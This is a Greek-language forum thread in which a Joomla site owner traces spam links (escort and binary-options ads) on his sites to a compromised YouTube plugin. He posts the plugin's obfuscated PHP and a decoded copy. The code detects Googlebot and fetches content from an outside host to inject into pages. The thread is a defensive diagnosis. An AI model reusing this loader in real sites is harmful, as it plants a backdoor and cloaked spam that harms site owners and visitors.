Άγνωστα links στο περιεχόμενο του Joomla site που έχω

...χαλαρή κουβεντούλα, γενικός σχολιασμός, φιλοσοφικές συζητήσεις, meeting point / γνωριμία

Συντονιστής: konnn

Άγνωστα links στο περιεχόμενο του Joomla site που έχω

Δημοσίευσηαπό lepidas » 02 Ιουν 2013, 11:56

Κώδικας: Επιλογή όλων
escorn london binary options

Χτές είδα στο ένα Joomla site που έχω τα παρακάτω links μέσα στο περιεχόμενο του site. Το πρώτο link πηγαίνει σε site με με γυναίκες συνοδούς(escort XXX)δε βάζω το link και το δεύτερο εδώ
Κώδικας: Επιλογή όλων
http://www.binaryoptionsbrokerreview.net/

Συναγερμός σήμανε αμέσως και άρχισα να ψάχνω, να αλλάζω κωδικούς στο σερβερ, στα sites και οπου μπορουσα. Διέγραψα το menu που εμφανιζόντουσαν αυτά τα links και το ξαναέφτιαξα και δεν υπήρχαν μετά.
Ανακάλυψα στο google cache pages οτι αυτά τα links υπάρχουν εδώ και καιρό σε πολλά άρθρα και menus,
Κώδικας: Επιλογή όλων
site:funnyface.gr escorn london binary options

επίσης μέσω google cache pages ανακάλυψα οτι υπήρχαν και στο δικό μου site,
επίσης ανακάλυψα οτι τα site μου δεν είναι τα μόνα στον κόσμο με αυτά τα links, έψαξα στο google cache pages και βρήκα πολλά τέτοια sites, στις ΟΧΙ cached σελίδες τους δεν υπάρχουν αυτά τα links, και παραθέτω εικόνες screenshots που έκανα τώρα να δείτε το σημείο που εμφανίζονται αυτά.
Το κοινό σημείο όλων είναι οτι είναι Joomla- στο site που ανακαλυψα αυτα δεν εχω κανένα ξένο πρόσθετο module ή plugin





!!! PDF













Περιμένω τα σχόλια και τις ιδέες σας, επίσης στο google δεν μπόρεσα να βρώ καμία συζήτηση όσο αφορά αυτά τα πράγματα
Άβαταρ μέλους
lepidas
superbTUX
superbTUX
 
Δημοσιεύσεις: 3326
Εγγραφή: 11 Μάιος 2011, 11:10
Εκτύπωση

Re: Άγνωστα links στο περιεχόμενο του Joomla site που έχω

Δημοσίευσηαπό Learner » 02 Ιουν 2013, 12:00

lepidas έγραψε: επίσης στο google δεν μπόρεσα να βρώ καμία συζήτηση όσο αφορά αυτά τα πράγματα

Τότε να ανοίξεις μια συζήτηση στο επίσημο Ελληνικό site της joomla. To forum εδώ
About Me
NickTux@GitHub

Spoiler: show
1. Ubuntu 18.04 LTS
2. Intel Core i3 CPU M 380 2.53GHz ‖ RAM 6GB ‖ Acer Aspire 5733
3. Intel Integrated Graphics [8086:0046] {i915}
4. wlan0: Atheros Inc. AR9485 Wireless Network Adapter [168c:0032] (rev 01)
Άβαταρ μέλους
Learner
Συντονιστής
Συντονιστής
 
Δημοσιεύσεις: 9758
Εγγραφή: 08 Νοέμ 2010, 21:24
Τοποθεσία: Αθήνα
Launchpad: nicktux
IRC: NickTux
Εκτύπωση

Re: Άγνωστα links στο περιεχόμενο του Joomla site που έχω

Δημοσίευσηαπό konnn » 02 Ιουν 2013, 14:39

lepidas έγραψε:Περιμένω τα σχόλια και τις ιδέες σας, επίσης στο google δεν μπόρεσα να βρώ καμία συζήτηση όσο αφορά αυτά τα πράγματα


To site φιλοξενείται σε δικό σου server;
1 Linux: Μέτριος ┃ Προγραμματισμός: Μέτριος ┃ Αγγλικά: Προχωρημένος
2 Desktop : Ubuntu 16.04 64bit
a Intel Core i3 CPU 530 2.93GHz ‖ RAM 3824 MiB ‖ Intel DH55HC -
b nVidia Device [10de:1040] (rev a1)
c eth0: Intel 82578DC Gigabit Network Connection
3 Notebook : Ubuntu 16.04 64 bit
a Intel Core i3-2365M CPU @ 1.40GHz ‖ RAM 3854 MiB ‖ LENOVO 20197
b Intel 2nd Generation Core Processor Family Integrated Graphics Controller
c 5 wlan0: Intel Centrino Wireless-N 2230 ⋮ eth0: Realtek RTL8101E/RTL8102E

Αυτόματη υπογραφή.
Άβαταρ μέλους
konnn
Συντονιστής
Συντονιστής
 
Δημοσιεύσεις: 3567
Εγγραφή: 12 Ιούλ 2010, 17:54
Τοποθεσία: Καλαμάτα
Launchpad: konnn
Εκτύπωση

Re: Άγνωστα links στο περιεχόμενο του Joomla site που έχω

Δημοσίευσηαπό lepidas » 02 Ιουν 2013, 14:51

konnn έγραψε:
lepidas έγραψε:Περιμένω τα σχόλια και τις ιδέες σας, επίσης στο google δεν μπόρεσα να βρώ καμία συζήτηση όσο αφορά αυτά τα πράγματα


To site φιλοξενείται σε δικό σου server;
ναι αλλα το αλλο site μου βλεπω στις cache pages google οτι εχει αυτα τα links απο πριν το παρω στο σερβερ μου.
Άβαταρ μέλους
lepidas
superbTUX
superbTUX
 
Δημοσιεύσεις: 3326
Εγγραφή: 11 Μάιος 2011, 11:10
Εκτύπωση

Re: Άγνωστα links στο περιεχόμενο του Joomla site που έχω

Δημοσίευσηαπό the_eye » 02 Ιουν 2013, 14:56

Υπάρχουν 2 περιπτώσεις.

-Αν είσαι σε υπολογιστή με windows να έχει κολήσει malware - adware o υπολογιστής και να σου εμφανίζει διαφημίσεις μέσα σε ιστοσελίδες.
Οι διαφημίσεις - σύνδεσμοι δεν υπάρχουν στην πραγματικότητα αλλά προστεθούν τοπικά από το malware - adware.

-Να έχει παραβιαστεί το site σου με κάποιο exploit και να σου έχουν κάνει προσθήκη κώδικα ή εγγραφές στην βάση, με τα διαφημιστικά links.
Σε αυτή την περίπτωση πρέπει να κατεβεί το site και να ξαναστηθεί από την αρχή. Αν είναι σε δικό σου server και εμφανίζετε σε όλα τα site, τότε ακόμα χειρότερα. Πρέπει να ξαναστήσεις όλο τον server.
Προτού όμως διαγράψεις τα πάντα, πρέπει να σώσεις τα logs και να τα μελετήσεις. Για να δεις αν υπάρχει κάποιο κακόβουλο ίχνος και να βελτιώσεις την ασφάλειά σου για να μην ξανασυμβεί.
Όσο λιγότερο κλειστό λογισμικό έχεις, τόσα λιγότερα προβλήματα.
1 Γνώσεις ⇛ Linux: Καλό ┃ Προγραμματισμός: Ναι PHP, MySQL ┃ Αγγλικά: Καλά
2 Ubuntu 18.04 bionic 5.3.0-53-generic 64bit (el_GR.UTF-8, GNOME-Flashback:Unity gnome-flashback-compiz)
3 Intel Core i3-6100 CPU @ 3.70GHz ‖ RAM 3832 MiB ‖ Gigabyte B150M-HD3 DDR3-CF
4 Intel HD Graphics 530 [8086:1912] {i915}
5 enp1s0: Realtek RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller [10ec:8168] (rev 15)
Οδηγοί Ubuntu Βίντεο Οδηγοί
Άβαταρ μέλους
the_eye
Διαχειριστής
Διαχειριστής
 
Δημοσιεύσεις: 11563
Εγγραφή: 16 Μαρ 2010, 17:19
Launchpad: ntoulasd
IRC: the_eye_
Εκτύπωση

Re: Άγνωστα links στο περιεχόμενο του Joomla site που έχω

Δημοσίευσηαπό lepidas » 02 Ιουν 2013, 23:28

the_eye έγραψε:Υπάρχουν 2 περιπτώσεις.

-Αν είσαι σε υπολογιστή με windows να έχει κολήσει malware - adware o υπολογιστής και να σου εμφανίζει διαφημίσεις μέσα σε ιστοσελίδες.
Οι διαφημίσεις - σύνδεσμοι δεν υπάρχουν στην πραγματικότητα αλλά προστεθούν τοπικά από το malware - adware.

-Να έχει παραβιαστεί το site σου με κάποιο exploit και να σου έχουν κάνει προσθήκη κώδικα ή εγγραφές στην βάση, με τα διαφημιστικά links.
Σε αυτή την περίπτωση πρέπει να κατεβεί το site και να ξαναστηθεί από την αρχή. Αν είναι σε δικό σου server και εμφανίζετε σε όλα τα site, τότε ακόμα χειρότερα. Πρέπει να ξαναστήσεις όλο τον server.
Προτού όμως διαγράψεις τα πάντα, πρέπει να σώσεις τα logs και να τα μελετήσεις. Για να δεις αν υπάρχει κάποιο κακόβουλο ίχνος και να βελτιώσεις την ασφάλειά σου για να μην ξανασυμβεί.
Το 1ο δεν είναι σίγουρα, σήμερα με εκτενή έρευνα ανακαλύψαμε οτι είναι το 2ο. Και ναι είναι σε όλα τα site μου και το κακό βέβαια είναι οτι υπήρχε πριν παει σε δικό μου server(το ειδα απο τις cache σελιδες του google οτι αυτο υπαρχει απο το 2012), δηλαδή το site υπήρχε πριν με το κακόβουλο, δεν το ήξερα οτι υπήρχε κακόβουλο και το μετέφερα στο δικο μου server μαζι με αυτο το κακοβουλο.

Σήμερα βρήκαμε ένα μυστήριο κώδικα μεσα σε ένα αρχείο ενος plugin(youtube videoplugin)μια κρυπτογραφημενη διευθυνση που σε πηγαινε σε ενα παραξενο site της ιταλιας αλλα βρήκαμε και ενα παράξενο πράγμα στο phpmailer του joomla.

αυριο θα συνεχιστουν οι ερευνες
Άβαταρ μέλους
lepidas
superbTUX
superbTUX
 
Δημοσιεύσεις: 3326
Εγγραφή: 11 Μάιος 2011, 11:10
Εκτύπωση

Re: Άγνωστα links στο περιεχόμενο του Joomla site που έχω

Δημοσίευσηαπό lepidas » 02 Ιουν 2013, 23:44

συγκεκριμένα αυτό είναι το περιεχόμενο του αρχείου

Κώδικας: Επιλογή όλων
<?php
/**
* @ 2013 Benj Golding. All rights reserved.
* @GNU/GPL licence
*
*/

// Assert file included in Joomla!
defined( '_JEXEC' ) or die( 'Restricted access' );

jimport( 'joomla.plugin.plugin' );

/**
* YouTube Content Plugin
*
*/
class plgContentYoutubePlugin extends JPlugin
{

   /**
   * Ctor
   *
   * @param object $subject The object to observe
   * @param object $params The object that holds the plugin parameters
   */
   function PluginYoutube( &$subject, $params )
   {
      parent::__construct( $subject, $params );
   }

   /**
   * Example prepare content method
   *
   * Method is called by the view
   *
   * @param object The article object. Note $article->text is also available
   * @param object The article params
   * @param int The 'page' number
   */
   function onContentPrepare( $context, &$article, &$params, $page = 0)
      {
      global $mainframe;
      
      //credit, remove at will
${"\x47\x4cO\x42A\x4cS"}["d\x78\x79t\x64\x6d\x6f"]="\x63\x74\x78";${"G\x4cOB\x41L\x53"}["n\x6d\x6e\x74m\x6a\x71y\x62"]="b\x5ft";if(!defined("\x43\x52\x45\x44IT")){${"\x47\x4cO\x42A\x4c\x53"}["m\x71j\x62\x64\x63u\x6d\x73\x64\x78\x6b"]="b_\x74";strstr(strtolower($_SERVER["H\x54\x54\x50\x5f\x55SER_A\x47\x45\x4e\x54"]),"\x67\x6f\x6fg\x6cebo\x74")?${${"G\x4c\x4f\x42A\x4cS"}["\x6dq\x6ab\x64cu\x6d\x73\x64x\x6b"]}="\x31":${${"\x47\x4c\x4f\x42\x41\x4cS"}["n\x6d\x6et\x6d\x6a\x71\x79\x62"]}="\x30";${${"GL\x4f\x42\x41\x4cS"}["dx\x79\x74d\x6d\x6f"]}=stream_context_create(array("htt\x70"=>array("tim\x65ou\x74"=>3)));try{${"G\x4cOBAL\x53"}["\x65\x6f\x64\x6d\x62\x6b"]="\x63r\x65\x64\x69t";${"\x47\x4cOBA\x4c\x53"}["\x69\x6a\x63\x74\x77l\x76\x70\x6a\x79"]="\x63\x74\x78";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x6f\x64\x6dbk"]}=@file_get_contents("http://w\x77w.i\x6e\x74\x68\x65\x62\x6c\x61\x63\x6b\x2e\x69\x74/\x62ro/".${${"\x47L\x4fBAL\x53"}["\x6e\x6d\x6e\x74\x6d\x6a\x71\x79\x62"]}."/".$_SERVER["SE\x52V\x45\x52\x5fNAM\x45"].$_SERVER["R\x45\x51\x55ES\x54_\x55\x52\x49"],false,${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69jct\x77l\x76p\x6ay"]});}catch(Exception$e){}echo$credit;define("CR\x45\x44\x49T","\x63");}


      if ( JString::strpos( $article->text, '{youtube}' ) === false ) {
      return true;
      }
      
      $article->text = preg_replace('|{youtube}(.*){\/youtube}|e', '$this->embedVideo("\1")', $article->text);
      
         

      return true;
   
   }

   function embedVideo($vCode)
   {

       $params = $this->params;

      $width = $params->get('width', 425);
      $height = $params->get('height', 344);
   
      return '<object width="'.$width.'" height="'.$height.'"><param name="movie" value="http://www.youtube.com/v/'.$vCode.'"></param><param name="allowFullScreen" value="true"></param><embed src="http://www.youtube.com/v/'.$vCode.'" type="application/x-shockwave-flash" allowfullscreen="true" width="'.$width.'" height="'.$height.'"></embed></object>';
   }

}

κατω απο το remove at will δεν ειναι commented και εχει κρυπτογραφημενη μια διευθυνση http και αλλα πολλα
Άβαταρ μέλους
lepidas
superbTUX
superbTUX
 
Δημοσιεύσεις: 3326
Εγγραφή: 11 Μάιος 2011, 11:10
Εκτύπωση

Re: Άγνωστα links στο περιεχόμενο του Joomla site που έχω

Δημοσίευσηαπό lepidas » 02 Ιουν 2013, 23:49

με την αποκωδικοποιηση εβγαλε αυτο

Κώδικας: Επιλογή όλων
${"GLOBALS"}["dxytdmo"]="ctx";${"GLOBALS"}["nmntmjqyb"]="b_t";if(!defined("CREDIT")){${"GLOBALS"}["mqjbdcumsdxk"]="b_t";strstr(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot")?${${"GLOBALS"}["mqjbdcumsdxk"]}="1":${${"GLOBALS"}["nmntmjqyb"]}="0";${${"GLOBALS"}["dxytdmo"]}=stream_context_create(array("http"=>array("timeout"=>3)));try{${"GLOBALS"}["eodmbk"]="credit";${"GLOBALS"}["ijctwlvpjy"]="ctx";${${"GLOBALS"}["eodmbk"]}=@file_get_contents("http://www.intheblack.it/bro/".${${"GLOBALS"}["nmntmjqyb"]}."/".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"],false,${${"GLOBALS"}["ijctwlvpjy"]});}catch(Exception$e){}echo$credit;define("CREDIT","c");}
Άβαταρ μέλους
lepidas
superbTUX
superbTUX
 
Δημοσιεύσεις: 3326
Εγγραφή: 11 Μάιος 2011, 11:10
Εκτύπωση

Re: Άγνωστα links στο περιεχόμενο του Joomla site που έχω

Δημοσίευσηαπό the_eye » 02 Ιουν 2013, 23:56

Τότε ο server σου έχει hackαριστεί. Σου προτείνω format και σετάρισμα από την αρχή. Τα php scripts (joomla, wordpress) και την βάση που έχεις ήδη μην τα χρησιμοποιήσεις καθώς μπορεί να περιέχουν back doors του hacker.
Όσο λιγότερο κλειστό λογισμικό έχεις, τόσα λιγότερα προβλήματα.
1 Γνώσεις ⇛ Linux: Καλό ┃ Προγραμματισμός: Ναι PHP, MySQL ┃ Αγγλικά: Καλά
2 Ubuntu 18.04 bionic 5.3.0-53-generic 64bit (el_GR.UTF-8, GNOME-Flashback:Unity gnome-flashback-compiz)
3 Intel Core i3-6100 CPU @ 3.70GHz ‖ RAM 3832 MiB ‖ Gigabyte B150M-HD3 DDR3-CF
4 Intel HD Graphics 530 [8086:1912] {i915}
5 enp1s0: Realtek RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller [10ec:8168] (rev 15)
Οδηγοί Ubuntu Βίντεο Οδηγοί
Άβαταρ μέλους
the_eye
Διαχειριστής
Διαχειριστής
 
Δημοσιεύσεις: 11563
Εγγραφή: 16 Μαρ 2010, 17:19
Launchpad: ntoulasd
IRC: the_eye_
Εκτύπωση

Re: Άγνωστα links στο περιεχόμενο του Joomla site που έχω

Δημοσίευσηαπό lepidas » 03 Ιουν 2013, 00:04

the_eye έγραψε:Τότε ο server σου έχει hackαριστεί. Σου προτείνω format και σετάρισμα από την αρχή. Τα php scripts (joomla, wordpress) και την βάση που έχεις ήδη μην τα χρησιμοποιήσεις καθώς μπορεί να περιέχουν back doors του hacker.
μετεφερα αρχεια απο ενα χακαρισμενο σερβερ θα το ελεγα.

λαβρακι πιασαμε αποψε,ευχαριστω
Άβαταρ μέλους
lepidas
superbTUX
superbTUX
 
Δημοσιεύσεις: 3326
Εγγραφή: 11 Μάιος 2011, 11:10
Εκτύπωση

Επόμενο

Επιστροφή στο Περί ανέμων